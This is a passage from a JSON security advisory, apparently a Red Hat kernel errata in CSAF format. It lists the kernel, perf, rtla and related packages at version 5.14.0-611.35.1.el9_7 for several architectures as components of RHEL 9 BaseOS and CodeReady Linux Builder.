"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.src",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
